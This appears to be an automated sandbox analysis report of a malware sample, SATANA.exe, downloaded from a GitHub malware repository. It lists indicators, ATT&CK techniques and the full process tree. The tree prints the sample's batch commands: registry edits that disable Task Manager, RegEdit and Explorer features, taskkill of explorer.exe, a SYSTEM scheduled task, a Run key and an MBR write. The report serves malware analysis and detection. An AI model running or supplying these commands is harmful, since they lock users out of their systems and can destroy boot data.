gozi | hxxps://github[.]com/pankoza2-pl/malwaredatabase-old

Resubmissions

03/03/2025, 18:11

250303-wsrsyavlz9 3

03/03/2025, 18:09

03/03/2025, 18:07

03/03/2025, 18:04

03/03/2025, 18:02

Analysis

max time kernel
60s
max time network
60s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
03/03/2025, 18:09

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

https://github.com/pankoza2-pl/malwaredatabase-old

Score

10^/10

gozi banker bootkit defense_evasion discovery isfb persistence trojan upx

Malware Config

Extracted

Family

gozi

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Gozi family
gozi

Disables RegEdit via registry modification 1 IoCs

defense_evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Downloads MZ/PE file 1 IoCs

flow	pid	Process
66	5952	chrome.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\rteth.sys	cmd.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	SATANA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	SATANA (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation	SATANA.exe

Executes dropped EXE 4 IoCs

pid	Process
2772	SATANA.exe
5080	2.exe
3416	SATANA (1).exe
4212	SATANA.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1354.tmp\\2.exe"	2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
65	raw.githubusercontent.com
66	raw.githubusercontent.com

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	2.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\wkx4em.exe	cmd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023db7-201.dat	upx
behavioral1/memory/2772-219-0x0000000000400000-0x0000000000443000-memory.dmp	upx
behavioral1/memory/2772-244-0x0000000000400000-0x0000000000443000-memory.dmp	upx
behavioral1/memory/2772-263-0x0000000000400000-0x0000000000443000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4816	5080	WerFault.exe	153

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SATANA.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SATANA (1).exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SATANA.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Kills process with taskkill 9 IoCs

defense_evasion

pid	Process
2300	taskkill.exe
1080	taskkill.exe
2160	taskkill.exe
1696	taskkill.exe
5028	taskkill.exe
5424	taskkill.exe
4928	taskkill.exe
3200	taskkill.exe
5440	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0"	reg.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133854989894336211"	chrome.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1836	schtasks.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
4888	chrome.exe
4888	chrome.exe
5080	2.exe
5080	2.exe
5080	2.exe
5080	2.exe
5080	2.exe
5080	2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
4888	chrome.exe
4888	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeDebugPrivilege	3200	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	5440	taskkill.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe
Token: SeCreatePagefilePrivilege	4888	chrome.exe
Token: SeShutdownPrivilege	4888	chrome.exe

Suspicious use of FindShellTrayWindow 43 IoCs

pid	Process
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe
4888	chrome.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2772	SATANA.exe
5080	2.exe
3416	SATANA (1).exe
4212	SATANA.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4888 wrote to memory of 2060	4888	chrome.exe	88
PID 4888 wrote to memory of 2060	4888	chrome.exe	88
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 1868	4888	chrome.exe	89
PID 4888 wrote to memory of 5952	4888	chrome.exe	90
PID 4888 wrote to memory of 5952	4888	chrome.exe	90
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91
PID 4888 wrote to memory of 3056	4888	chrome.exe	91

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb9c10cc40,0x7ffb9c10cc4c,0x7ffb9c10cc58
  2⤵
  PID:2060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1680,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1676 /prefetch:2
  2⤵
  PID:1868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:5952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2428 /prefetch:8
  2⤵
  PID:3056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
  2⤵
  PID:5860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4592,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4608 /prefetch:8
  2⤵
  PID:3936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5060,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5072 /prefetch:8
  2⤵
  PID:2416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4744,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4972,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5408 /prefetch:8
  2⤵
  PID:1836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5552 /prefetch:8
  2⤵
  PID:224
- C:\Users\Admin\Downloads\SATANA.exe
  "C:\Users\Admin\Downloads\SATANA.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2772
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1354.tmp\1355.bat C:\Users\Admin\Downloads\SATANA.exe"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    PID:5884
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
      4⤵
      PID:4912
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
      4⤵
      PID:5216
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
      4⤵
      PID:6060
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
      4⤵
      Modifies Internet Explorer settings
      PID:1352
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
      4⤵
      PID:5600
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
      4⤵
      PID:6076
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
      4⤵
      PID:4168
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
      4⤵
      PID:3496
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
      4⤵
      PID:4820
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:2524
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
      4⤵
      PID:1864
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
      4⤵
      PID:5784
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
      4⤵
      PID:3996
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
      4⤵
      PID:3032
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:1464
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
      4⤵
      PID:3040
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:2236
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:1772
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
      4⤵
      PID:1592
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
      4⤵
      PID:2792
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
      4⤵
      PID:4416
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
      4⤵
      PID:2280
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
      4⤵
      PID:1984
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
      4⤵
      PID:6024
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
      4⤵
      PID:3908
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
      4⤵
      PID:1628
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
      4⤵
      PID:5696
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
      4⤵
      PID:2260
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
      4⤵
      PID:4592
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
      4⤵
      PID:3960
  - - C:\Windows\system32\reg.exe
      reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
      4⤵
      PID:3292
  - - C:\Windows\system32\rundll32.exe
      rundll32 user32, SwapMouseButton
      4⤵
      PID:4504
  - - C:\Windows\system32\reg.exe
      reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
      4⤵
      Disables RegEdit via registry modification
      PID:4728
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM explorer.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3200
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM taskmgr.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1696
  - - C:\Windows\system32\taskkill.exe
      taskkill /IM notepad.exe /F
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5440
  - - C:\Users\Admin\AppData\Local\Temp\1354.tmp\2.exe
      2.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Writes to the Master Boot Record (MBR)
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      PID:5080
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\1354.tmp\2.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1836
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 524
        5⤵
        Program crash
        
        PID:4816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3824,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5180 /prefetch:8
  2⤵
  PID:3620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4628,i,5610788072648676284,17212228004455157563,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5072 /prefetch:8
  2⤵
  PID:3252
